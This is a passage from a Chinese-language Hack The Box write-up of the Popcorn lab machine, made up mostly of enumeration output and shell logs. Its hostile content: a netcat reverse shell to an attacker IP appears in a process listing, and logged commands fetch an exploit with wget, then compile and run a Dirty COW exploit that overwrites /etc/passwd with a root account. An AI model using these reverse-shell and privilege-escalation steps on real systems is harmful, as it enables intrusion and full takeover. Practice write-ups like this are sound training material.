root       293  0.0  0.0      0     0 ?        S<   14:48   0:00 [mpt/0]
root       417  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_32]
root       432  0.0  0.0      0     0 ?        S<   14:48   0:00 [kdmflush]
root       434  0.0  0.0      0     0 ?        S<   14:48   0:00 [kdmflush]
root       524  0.0  0.0      0     0 ?        S<   14:48   0:00 [kjournald2]
root       574  0.0  0.0   2284   836 ?        S    14:48   0:00 upstart-udev-bridge --daemon
root       577  0.0  0.1   2768  1224 ?        S<s  14:48   0:00 udevd --daemon
root       777  0.0  0.1   2764  1184 ?        S<   14:48   0:00 udevd --daemon
root       778  0.0  0.1   2764  1184 ?        S<   14:48   0:00 udevd --daemon
root       820  0.0  0.0      0     0 ?        S<   14:48   0:00 [kpsmoused]
root       878  0.0  0.0   1852   544 ?        Ss   14:48   0:00 dd bs=1 if=/proc/kmsg of=/var/run/rsyslog/kmsg
syslog     921  0.0  0.1  33528  1536 ?        Sl   14:48   0:00 rsyslogd -c4
root      1075  0.0  0.0   1704   544 tty4     Ss+  14:48   0:00 /sbin/getty -8 38400 tty4
root      1082  0.0  0.0   1704   544 tty5     Ss+  14:48   0:00 /sbin/getty -8 38400 tty5
root      1085  0.0  0.0   1704   544 tty2     Ss+  14:48   0:00 /sbin/getty -8 38400 tty2
root      1086  0.0  0.0   1704   540 tty3     Ss+  14:48   0:00 /sbin/getty -8 38400 tty3
root      1088  0.0  0.0   1704   548 tty6     Ss+  14:48   0:00 /sbin/getty -8 38400 tty6
root      1096  0.0  0.0   2092   872 ?        Ss   14:48   0:00 cron
daemon    1097  0.0  0.0   1964   420 ?        Ss   14:48   0:00 atd
root      1239  0.0  0.0   1752   536 ?        S    14:48   0:00 /bin/sh /usr/bin/mysqld_safe
root      1279  0.0  0.0      0     0 ?        S<   14:48   0:00 [vmmemctl]
mysql     1485  0.0  1.8 147236 18740 ?        Sl   14:48   0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root      1487  0.0  0.0   1668   548 ?        S    14:48   0:00 logger -t mysqld -p daemon.error
root      1637  0.0  0.6  33324  6980 ?        Ss   14:48   0:00 /usr/sbin/apache2 -k start
root      1657  0.0  0.0   1704   548 tty1     Ss+  14:48   0:00 /sbin/getty -8 38400 tty1
root      1659  0.0  0.3  17008  3812 ?        Sl   14:48   0:05 /usr/sbin/vmtoolsd
root      1697  0.0  0.7  13752  7680 ?        S    14:48   0:00 /usr/lib/vmware-vgauth/VGAuthService -s
root      1717  0.0  0.0   2144   304 ?        Ss   14:48   0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp3/dhclient.eth0.leases eth0
root      1767  0.0  0.1   5436  1076 ?        Ss   14:48   0:00 /usr/sbin/sshd
www-data  1840  0.0  0.7  34180  7348 ?        S    15:09   0:00 /usr/sbin/apache2 -k start
www-data  1843  0.0  0.7  34228  8040 ?        S    15:09   0:00 /usr/sbin/apache2 -k start
www-data  1844  0.0  0.7  34244  7536 ?        S    15:09   0:00 /usr/sbin/apache2 -k start
www-data  1854  0.0  0.7  34208  7504 ?        S    15:17   0:00 /usr/sbin/apache2 -k start
www-data  1859  0.0  0.7  34308  7572 ?        S    15:18   0:00 /usr/sbin/apache2 -k start
www-data  1868  0.0  0.6  34040  6752 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data  1869  0.0  0.4  33908  4708 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data  1870  0.0  0.6  34068  6936 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data  1871  0.0  0.6  33908  6728 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data  1889  0.0  0.6  33672  6284 ?        S    15:46   0:00 /usr/sbin/apache2 -k start
www-data  1890  0.0  0.0   1752   488 ?        S    15:57   0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.4 443 >/tmp/f
www-data  1893  0.0  0.0   1704   412 ?        S    15:57   0:00 cat /tmp/f
www-data  1894  0.0  0.0   1752   504 ?        S    15:57   0:00 sh -i
www-data  1895  0.0  0.0   1724   608 ?        S    15:57   0:00 nc 10.10.14.4 443
www-data  1956  0.5  0.1   3348  1692 ?        S    16:31   0:00 /bin/bash ./LinEnum.sh
www-data  1957  0.0  0.1   3876  1588 ?        R    16:31   0:00 /bin/bash ./LinEnum.sh
www-data  1959  0.0  0.0   1688   444 ?        R    16:31   0:00 tee -a
www-data  2187  0.0  0.1   3876  1288 ?        R    16:31   0:00 /bin/bash ./LinEnum.sh
www-data  2188  0.0  0.0   2364   920 ?        R    16:31   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root  875596 Sep 14  2009 /bin/bash
lrwxrwxrwx 1 root root       4 Mar 17  2017 /bin/sh -> dash
-rwxr-xr-x 1 root root   18360 Oct 23  2009 /sbin/getty
-rwxr-xr-x 1 root root  169676 Oct 15  2009 /sbin/init
lrwxrwxrwx 1 root root      37 Oct 26  2020 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin32/appLoader
lrwxrwxrwx 1 root root      34 Mar 17  2017 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
-rwxr-xr-x 1 root root 8376232 Nov 10  2010 /usr/sbin/mysqld
-rwxr-xr-x 1 root root  414304 Oct 22  2009 /usr/sbin/sshd
lrwxrwxrwx 1 root root      37 Oct 26  2020 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd


[-] /etc/init.d/ binary permissions:
total 184
drwxr-xr-x  2 root root  4096 Oct 26  2020 .
drwxr-xr-x 87 root root  4096 Jan  2 14:48 ..
-rw-r--r--  1 root root    24 Mar 17  2017 .depend.boot
-rw-r--r--  1 root root    24 Mar 17  2017 .depend.start
-rw-r--r--  1 root root    10 Mar 17  2017 .depend.stop
-rw-r--r--  1 root root     0 Mar 17  2017 .legacy-bootordering
-rw-r--r--  1 root root 12288 Oct 14  2009 .umountroot.swp
-rw-r--r--  1 root root  1510 Sep  7  2009 README
-rwxr-xr-x  1 root root  6461 Nov 18  2010 apache2
-rwxr-xr-x  1 root root  3314 Oct 17  2009 apparmor
lrwxrwxrwx  1 root root    21 Mar 17  2017 apport -> /lib/init/upstart-job
lrwxrwxrwx  1 root root    21 Mar 17  2017 atd -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  2341 Sep  7  2009 bootlogd
-rwxr-xr-x  1 root root  1670 Jul  6  2009 console-setup
lrwxrwxrwx  1 root root    21 Mar 17  2017 cron -> /lib/init/upstart-job
lrwxrwxrwx  1 root root    21 Mar 17  2017 dmesg -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  1235 Feb 20  2009 dns-clean
-rwxr-xr-x  1 root root  1105 Oct 24  2009 grub-common
-rwxr-xr-x  1 root root  1329 Sep  7  2009 halt
lrwxrwxrwx  1 root root    21 Mar 17  2017 hwclock -> /lib/init/upstart-job
lrwxrwxrwx  1 root root    21 Mar 17  2017 hwclock-save -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  1404 Jul  6  2009 keyboard-setup
-rwxr-xr-x  1 root root  1293 Sep  7  2009 killprocs
lrwxrwxrwx  1 root root    21 Mar 17  2017 module-init-tools -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  5609 Nov 10  2010 mysql
-rwxr-xr-x  1 root root  2070 Sep 15  2009 networking
-rwxr-xr-x  1 root root   882 Sep  7  2009 ondemand
-rwxr-xr-x  1 root root   420 Feb 20  2009 pppd-dns
lrwxrwxrwx  1 root root    21 Mar 17  2017 procps -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  8863 Sep  7  2009 rc
-rwxr-xr-x  1 root root   801 Sep  7  2009 rc.local
-rwxr-xr-x  1 root root   117 Sep  7  2009 rcS
-rwxr-xr-x  1 root root   639 Sep  7  2009 reboot
-rwxr-xr-x  1 root root  4310 Jun 25  2009 rsync
lrwxrwxrwx  1 root root    21 Mar 17  2017 rsyslog -> /lib/init/upstart-job
lrwxrwxrwx  1 root root    21 Mar 17  2017 rsyslog-kmsg -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  1055 Jul  6  2009 screen-cleanup
-rwxr-xr-x  1 root root  2283 Sep  7  2009 sendsigs
-rwxr-xr-x  1 root root   590 Sep  7  2009 single
-rw-r--r--  1 root root  4271 Sep  7  2009 skeleton
-rwxr-xr-x  1 root root  3878 Oct 22  2009 ssh
-rwxr-xr-x  1 root root   519 Sep  7  2009 stop-bootlogd
-rwxr-xr-x  1 root root  1095 Sep  7  2009 stop-bootlogd-single
lrwxrwxrwx  1 root root    21 Mar 17  2017 udev -> /lib/init/upstart-job
lrwxrwxrwx  1 root root    21 Mar 17  2017 udev-finish -> /lib/init/upstart-job
lrwxrwxrwx  1 root root    21 Mar 17  2017 udevmonitor -> /lib/init/upstart-job
lrwxrwxrwx  1 root root    21 Mar 17  2017 udevtrigger -> /lib/init/upstart-job
lrwxrwxrwx  1 root root    21 Mar 17  2017 ufw -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  2746 Oct 14  2009 umountfs
-rwxr-xr-x  1 root root  2075 Oct 14  2009 umountnfs.sh
-rwxr-xr-x  1 root root  1683 Oct 14  2009 umountroot
-rwxr-xr-x  1 root root  1997 Sep  7  2009 urandom
-rwxr-xr-x  1 root root  2327 Sep 20  2009 wpa-ifupdown
-rwxr-xr-x  1 root root  1777 Dec  5  2008 x11-common


[-] /etc/init/ config file permissions:
total 144
drwxr-xr-x  2 root root 4096 Oct 26  2020 .
drwxr-xr-x 87 root root 4096 Jan  2 14:48 ..
-rw-r--r--  1 root root 1271 Oct 23  2009 apport.conf
-rw-r--r--  1 root root  261 Sep 15  2009 atd.conf
-rw-r--r--  1 root root  356 Oct 15  2009 control-alt-delete.conf
-rw-r--r--  1 root root  297 Sep 15  2009 cron.conf
-rw-r--r--  1 root root  273 Oct 15  2009 dmesg.conf
-rw-r--r--  1 root root  312 Sep 10  2009 hostname.conf
-rw-r--r--  1 root root  444 Oct 23  2009 hwclock-save.conf
-rw-r--r--  1 root root  557 Oct 23  2009 hwclock.conf
-rw-r--r--  1 root root  367 Sep 16  2009 module-init-tools.conf
-rw-r--r--  1 root root  335 Oct 26  2009 mountall-net.conf
-rw-r--r--  1 root root  261 Oct 26  2009 mountall-reboot.conf
-rw-r--r--  1 root root 1073 Oct 26  2009 mountall-shell.conf
-rw-r--r--  1 root root  793 Oct 26  2009 mountall.conf
-rw-r--r--  1 root root  493 Sep 14  2009 network-interface.conf
-rw-r--r--  1 root root  290 Sep 15  2009 networking.conf
-rw-r--r--  1 root root  293 Sep 16  2009 procps.conf
-rw-r--r--  1 root root 1453 Oct 15  2009 rc-sysinit.conf
-rw-r--r--  1 root root  354 Oct 15  2009 rc.conf
-rw-r--r--  1 root root  822 Oct 15  2009 rcS.conf
-rw-r--r--  1 root root  589 Oct 15  2009 rsyslog-kmsg.conf
-rw-r--r--  1 root root  280 Oct 15  2009 rsyslog.conf
-rw-r--r--  1 root root  228 Oct 15  2009 tty1.conf
-rw-r--r--  1 root root  213 Oct 15  2009 tty2.conf
-rw-r--r--  1 root root  213 Oct 15  2009 tty3.conf
-rw-r--r--  1 root root  213 Oct 15  2009 tty4.conf
-rw-r--r--  1 root root  213 Oct 15  2009 tty5.conf
-rw-r--r--  1 root root  213 Oct 15  2009 tty6.conf
-rw-r--r--  1 root root  769 Sep 22  2009 udev-finish.conf
-rw-r--r--  1 root root  316 Sep 22  2009 udev.conf
-rw-r--r--  1 root root  356 Sep 22  2009 udevmonitor.conf
-rw-r--r--  1 root root  318 Sep 22  2009 udevtrigger.conf
-rw-r--r--  1 root root  344 Sep 24  2009 ufw.conf
-rw-r--r--  1 root root  313 Oct 15  2009 upstart-udev-bridge.conf
-r--r--r--  1 root root  901 Oct 26  2020 vmware-tools.conf


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.7.0


[-] MYSQL version:
mysql  Ver 14.14 Distrib 5.1.37, for debian-linux-gnu (i486) using  EditLine wrapper


[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc


[-] Installed compilers:
ii  g++                                 4:4.4.1-1ubuntu2                  The GNU C++ compiler
ii  g++-4.4                             4.4.1-4ubuntu9                    The GNU C++ compiler
ii  gcc                                 4:4.4.1-1ubuntu2                  The GNU C compiler
ii  gcc-4.4                             4.4.1-4ubuntu9                    The GNU C compiler


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1031 Mar 17  2017 /etc/passwd
-rw-r--r-- 1 root root 691 Mar 17  2017 /etc/group
-rw-r--r-- 1 root root 497 Mar 17  2017 /etc/profile
-rw-r----- 1 root shadow 838 Mar 17  2017 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 30492 May 12  2009 /bin/ping6
-rwsr-xr-x 1 root root 34696 May 12  2009 /bin/ping
-rwsr-xr-x 1 root root 47096 Oct 23  2009 /bin/umount
-rwsr-xr-x 1 root root 72188 Oct 23  2009 /bin/mount
-rwsr-xr-x 1 root root 22064 Mar  5  2009 /bin/fusermount
-rwsr-xr-x 1 root root 31124 Jul 31  2009 /bin/su
-rwsr-xr-x 1 root root 9548 Jan 11  2011 /usr/lib/pt_chown
-r-sr-xr-x 1 root root 9532 Oct 26  2020 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Oct 26  2020 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 5544 Apr 29  2009 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 179120 Oct 22  2009 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 40332 Jul 31  2009 /usr/bin/chfn
-rwsr-xr-x 1 root root 30936 Jul 31  2009 /usr/bin/newgrp
-rwsr-xr-x 1 root root 52036 Nov  5  2008 /usr/bin/mtr
-rwsr-xr-x 1 root root 31756 Jul 31  2009 /usr/bin/chsh
-rwsr-xr-x 2 root root 123448 Jun 22  2009 /usr/bin/sudo
-rwsr-xr-x 1 root root 13948 May 12  2009 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 41292 Jul 31  2009 /usr/bin/passwd
-rwsr-xr-x 1 root root 13816 May 12  2009 /usr/bin/arping
-rwsr-xr-x 1 root root 57964 Jul 31  2009 /usr/bin/gpasswd
-rwsr-xr-x 2 root root 123448 Jun 22  2009 /usr/bin/sudoedit
-rwsr-sr-x 1 daemon daemon 46964 Sep 15  2009 /usr/bin/at
-rwsr-xr-- 1 root dip 277352 Feb 20  2009 /usr/sbin/pppd
-rwsr-sr-x 1 libuuid libuuid 13848 Oct 23  2009 /usr/sbin/uuidd


[-] SGID files:
-rwxr-sr-x 1 root shadow 30400 Sep  4  2009 /sbin/unix_chkpwd
-rwxr-sr-x 1 root mlocate 34408 Apr 29  2009 /usr/bin/mlocate
-rwxr-sr-x 1 root ssh 79912 Oct 22  2009 /usr/bin/ssh-agent
-rwxr-sr-x 1 root crontab 31712 Sep 15  2009 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 57580 Jul 31  2009 /usr/bin/chage
-rwxr-sr-x 3 root mail 9896 Jul  6  2009 /usr/bin/mail-lock
-rwxr-sr-x 3 root mail 9896 Jul  6  2009 /usr/bin/mail-unlock
-rwxr-sr-x 1 root tty 13864 Oct 23  2009 /usr/bin/wall
-rwxr-sr-x 3 root mail 9896 Jul  6  2009 /usr/bin/mail-touchlock
-rwxr-sr-x 1 root tty 9704 May  9  2009 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 14280 Nov 18  2008 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 361080 Jul  6  2009 /usr/bin/screen
-rwxr-sr-x 1 root shadow 18128 Jul 31  2009 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 46964 Sep 15  2009 /usr/bin/at
-rwsr-sr-x 1 libuuid libuuid 13848 Oct 23  2009 /usr/sbin/uuidd


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 34 Mar 17  2017 /etc/ld.so.conf
-rw-r--r-- 1 root root 1173 Oct 15  2009 /etc/rsyslog.conf
-rw-r--r-- 1 root root 92 Apr 27  2009 /etc/host.conf
-rw-r--r-- 1 root root 248 Apr 29  2009 /etc/updatedb.conf
-rw-r--r-- 1 root root 599 Aug 20  2009 /etc/logrotate.conf
-rw-r--r-- 1 root root 4794 Oct  6  2009 /etc/hdparm.conf
-rw-r--r-- 1 root root 2986 Mar 17  2017 /etc/adduser.conf
-rw-r--r-- 1 root root 350 Mar 17  2017 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 600 Aug  3  2009 /etc/deluser.conf
-rw-r--r-- 1 root root 2969 Oct  2  2009 /etc/debconf.conf
-rw-r--r-- 1 root root 126 Oct  1  2020 /etc/cvs-pserver.conf
-rw-r--r-- 1 root root 240 Mar 17  2017 /etc/kernel-img.conf
-rw-r--r-- 1 root root 15752 Jul 25  2009 /etc/ltrace.conf
-rw-r--r-- 1 root root 85 Oct  1  2020 /etc/resolv.conf
-rw-r--r-- 1 root root 2277 Sep 16  2009 /etc/sysctl.conf
-rw-r--r-- 1 root root 89 Oct  1  2020 /etc/cvs-cron.conf
-rw-r----- 1 root fuse 216 Mar  5  2009 /etc/fuse.conf
-rw-r--r-- 1 root root 645 May  2  2009 /etc/ts.conf
-rw-r--r-- 1 root root 6332 Mar 17  2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 1260 May 30  2008 /etc/ucf.conf
-rw-r--r-- 1 root root 885 Sep  7  2009 /etc/insserv.conf
-rw-r--r-- 1 root root 801 Oct 24  2009 /etc/mke2fs.conf
-rw-r--r-- 1 root root 321 Oct 23  2009 /etc/blkid.conf
-rw-r--r-- 1 root root 552 Sep  4  2009 /etc/pam.conf
-rw-r--r-- 1 root root 475 Aug 28  2006 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2689 Mar 27  2008 /etc/gai.conf


[-] Location and contents (if accessible) of .bash_history file(s):
/home/george/.bash_history


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 Mar 17  2017 .
drwxr-xr-x 15 root root 4096 Oct 26 15:16 ..


### SCAN COMPLETE ####################################
$ cat /home/george/.bash_history
$

25、到这里依旧没什么思路,然后通过查看演练报告,发现还是在用户根目录这里

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ 
$ cd /home/george/
$ ls -la
total 860
drwxr-xr-x 3 george george   4096 Oct 26 14:57 .
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
lrwxrwxrwx 1 george george      9 Oct 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Jan  2 14:48 user.txt
$ cd .cache
$ ls -la
total 8
drwxr-xr-x 2 george george 4096 Mar 17  2017 .
drwxr-xr-x 3 george george 4096 Oct 26 14:57 ..
-rw-r--r-- 1 george george    0 Mar 17  2017 motd.legal-displayed
$ cat motd.legal-displayed
$

26、而存在提权的关键就是这个motd.legal-displayed文件,使用谷歌百度相关漏洞

27、发现搜集的漏洞都不太对,只好使用演练报告里的exp了

https://www.exploit-db.com/exploits/40839

28、然后就开始了接下来的利用与提权了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
www-data@popcorn:/tmp$ uname -a
uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/tmp$ wget http://10.10.14.4/poc.c
wget http://10.10.14.4/poc.c
--2024-01-02 17:04:38--  http://10.10.14.4/poc.c
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4828 (4.7K) [text/x-csrc]
Saving to: `poc.c'

100%[======================================>] 4,828       --.-K/s   in 0.001s  

2024-01-02 17:04:39 (6.44 MB/s) - `poc.c' saved [4828/4828]

www-data@popcorn:/tmp$ ls
ls
14339.sh  LinEnum.sh  exp.sh  f  poc.c  vgauthsvclog.txt.0  vmware-root
www-data@popcorn:/tmp$ gcc -pthread poc.c -o poc -lcrypt
gcc -pthread poc.c -o poc -lcrypt
www-data@popcorn:/tmp$ ls -la
ls -la
total 104
drwxrwxrwt  5 root     root      4096 Jan  2 17:05 .
drwxr-xr-x 21 root     root      4096 Jan  2 14:48 ..
drwxrwxrwt  2 root     root      4096 Jan  2 14:48 .ICE-unix
drwxrwxrwt  2 root     root      4096 Jan  2 14:48 .X11-unix
lrwxrwxrwx  1 www-data www-data    11 Jan  2 16:52 .cache -> /etc/passwd
-rwxr-xr-x  1 www-data www-data  3042 Jan  2 16:56 14339.sh
-rwxr-xr-x  1 www-data www-data 46631 Jan  7  2020 LinEnum.sh
-rwxr-xr-x  1 www-data www-data  3056 Jan  2 16:40 exp.sh
prw-r--r--  1 www-data www-data     0 Jan  2 17:05 f
-rwxr-xr-x  1 www-data www-data 13601 Jan  2 17:05 poc
-rw-r--r--  1 www-data www-data  4828 Jan  2 17:04 poc.c
-rw-r--r--  1 root     root      1600 Jan  2 14:48 vgauthsvclog.txt.0
drwx------  2 root     root      4096 Jan  2 14:48 vmware-root

www-data@popcorn:/tmp$ ./poc
./poc
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: root

Complete line:
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash

mmap: b77f8000
su root
^C

29、然后重新获取反弹shell,切换 firefart 用户,获取到最新的权限,以及flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.6] 54733
sh: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@popcorn:/var/www/torrent/upload$ su firefart
su firefart
Password: root

firefart@popcorn:/var/www/torrent/upload# id
id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@popcorn:/var/www/torrent/upload# cat /root/root.txt
cat /root/root.txt
cfc4eac1c0d5160439ad60aff6784873
firefart@popcorn:/var/www/torrent/upload#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/4

打靶记
#shooting-range
Popcorn-htb-writeup
https://sh1yan.top/2024/01/02/Popcorn-htb-writeup/
作者
shiyan
发布于
2024年1月2日
许可协议